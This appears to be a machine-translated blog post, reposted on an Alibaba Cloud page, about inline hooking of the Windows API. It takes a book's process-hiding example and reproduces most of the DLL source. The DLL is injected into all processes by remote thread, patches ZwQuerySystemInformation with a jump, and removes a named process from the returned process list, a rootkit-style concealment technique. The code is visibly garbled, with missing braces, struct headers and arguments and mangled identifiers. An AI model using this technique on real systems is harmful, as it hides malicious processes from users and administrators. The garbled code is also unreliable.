Code modification Method "One" of the hook-and-take API

Source: Internet
Author: User

The IAT way is not to spend energy, the shell of the program with this method is not used at all.

Familiarize yourself with the code modification method. The book uses an instance of a hidden process.

The first approach

One, enumerate the process, load the DLL to all processes "inject with remote thread"

Second, pass in the name of the process that needs to be hidden

Third, to determine whether there has been a modification of the need to hook the function, if it has not been modified to get rid of, jump to their own function, while preserving the original value

Four, in their own substitution function to change the original value back, and then execute once, the completion of the relevant processing

Five, at the end of their own alternative function hook function, modify jump to the substitution function

The basic logic is this, like counter switch ...

DLL code:

#define STATUS_SUCCESS (0x00000000l)

typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
Pwstr Buffer;
} lsa_unicode_string, *plsa_unicode_string, unicode_string, *punicode_string;
systembasicinformation = 0,
Systemperformanceinformation = 2,
Systemtimeofdayinformation = 3,
Systemprocessinformation = 5,
Systemprocessorperformanceinformation = 8,
Systeminterruptinformation = 23,
Systemexceptioninformation = 33,
Systemregistryquotainformation = 37,
Systemlookasideinformation = 45
} System_information_class;

ULONG Nextentryoffset;
ULONG numberofthreads;
BYTE reserved1[48];
PVOID Reserved2[3];
HANDLE Uniqueprocessid;
PVOID Reserved3;
ULONG Handlecount;
BYTE Reserved4[4];
PVOID reserved5[11];
size_t PeakPageFileUsage;
size_t Privatepagecount;
Large_integer Reserved6[6];
} system_process_information, *psystem_process_information;
+0X3C Process Name

+0x44 Process ID

typedef NTSTATUS (WINAPI *pfzwquerysysteminformation)
(System_information_class Systeminformationclass,
PVOID SystemInformation,
ULONG Systeminformationlength,
Pulong returnlength);

#define Def_ntdll ("Ntdll.dll")
#define Def_zwquerysysteminformation ("Zwquerysysteminformation")

global variable (in sharing memory)
#pragma COMMENT (linker, "/section:. Share,rws ")
#pragma data_seg (". SHARE ")
TCHAR G_szprocname[max_path] = {L "};
#pragma data_seg ()

A global variable that holds the first five bytes of the hook function
BYTE G_porgbytes[5] = {0,};

BOOL Hook_by_code (LPCSTR szdllname, LPCSTR szfuncname, PROC pfnnew, pbyte porgbytes)
Farproc pfnorg;
DWORD Dwoldprotect, dwaddress;
BYTE Pbuf[5] = {0xe9, 0,};
Pbyte pbyte;

Fetch the hook function here.
pfnorg = (farproc) GetProcAddress (Getmodulehandlea (szdllname), szfuncname);
Pbyte = (pbyte) pfnorg;

Determine if the tick function has been modified
if (pbyte[0] = = 0xe9)
return FALSE;

Modifying protection properties
VirtualProtect ((LPVOID) pfnorg, 5, Page_execute_readwrite, &dwoldprotect);

Save the first 5 bytes of the original function
memcpy (Porgbytes, pfnorg, 5);

Calculate the difference of the jump address
= XXXX = pfnnew-pfnorg-5
Dwaddress = (DWORD) Pfnnew-(DWORD) pfnOrg-5;
memcpy (&pbuf[1], &dwaddress, 4);

Copy the jump code to the original function
memcpy (pfnorg, PBuf, 5);

Change the page protection property back
VirtualProtect ((LPVOID) pfnorg, 5, Dwoldprotect, &dwoldprotect);

return TRUE;

BOOL Unhook_by_code (LPCSTR szdllname, LPCSTR szfuncname, pbyte porgbytes)
Farproc PFunc;
DWORD Dwoldprotect;
Pbyte pbyte;

PFunc = GetProcAddress (Getmodulehandlea (szdllname), szfuncname);
Pbyte = (pbyte) pFunc;

if (pbyte[0]! = 0xe9)
return FALSE;

VirtualProtect ((LPVOID) PFunc, 5, Page_execute_readwrite, &dwoldprotect);

memcpy (PFunc, Porgbytes, 5);

VirtualProtect ((LPVOID) PFunc, 5, Dwoldprotect, &dwoldprotect);

return TRUE;

NTSTATUS WINAPI Newzwquerysysteminformation (
System_information_class Systeminformationclass,
PVOID SystemInformation,
ULONG Systeminformationlength,
Pulong returnlength)
NTSTATUS status;
Farproc PFunc;
Psystem_process_information Pcur, Pprev;
Char Szprocname[max_path] = {0,};

Decoupling first
Unhook_by_code (Def_ntdll, def_zwquerysysteminformation, g_porgbytes);

Execute once
PFunc = GetProcAddress (Getmodulehandlea (Def_ntdll),
Status = ((pfzwquerysysteminformation) pFunc)
(Systeminformationclass, SystemInformation,
Systeminformationlength, returnlength);

if (Status! = Status_success)
Goto __ntquerysysteminformation_end;

if (Systeminformationclass = = systemprocessinformation)
Pcur = (psystem_process_information) systeminformation;

while (TRUE)

Working with a linked list
if (pcur->reserved2[1]! = NULL)
if (!_tcsicmp ((PWSTR) pcur->reserved2[1], g_szprocname))
if (Pcur->nextentryoffset = = 0)//If it is already the last section
Pprev->nextentryoffset = 0;
else//Peel off this section of yourself
Pprev->nextentryoffset + = pcur->nextentryoffset;
Pprev = Pcur;

if (Pcur->nextentryoffset = = 0)

Point to next section
Pcur = (psystem_process_information)
(ULONG) Pcur + pcur->nextentryoffset);


Here actually used a jump command ...
Hook_by_code (Def_ntdll, Def_zwquerysysteminformation,
(PROC) Newzwquerysysteminformation, g_porgbytes);

return status;

BOOL WINAPI DllMain (hinstance hinstDLL, DWORD fdwreason, LPVOID lpvreserved)
Char Szcurproc[max_path] = {0,};
char *p = NULL;

If it's the program that started the DLL, quit.
GetModuleFileNameA (NULL, Szcurproc, MAX_PATH);
p = strrchr (szcurproc, ' \ \ ');
if ((P! = NULL) &&!_stricmp (p+1, "HideProc.exe"))
return TRUE;

Switch (Fdwreason)
#2. API hooking
Case Dll_process_attach:
Hook_by_code (Def_ntdll, Def_zwquerysysteminformation,
(PROC) Newzwquerysysteminformation, g_porgbytes);

#3. API unhooking
Case Dll_process_detach:
Unhook_by_code (Def_ntdll, Def_zwquerysysteminformation,

return TRUE;

#ifdef __cplusplus
extern "C" {

Export function, passing the name of the program to be hidden.
__declspec (dllexport) void Setprocname (LPCTSTR szprocname)
_tcscpy_s (G_szprocname, szprocname);
#ifdef __cplusplus

Code modification Method "One" of the hook-and-take API

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.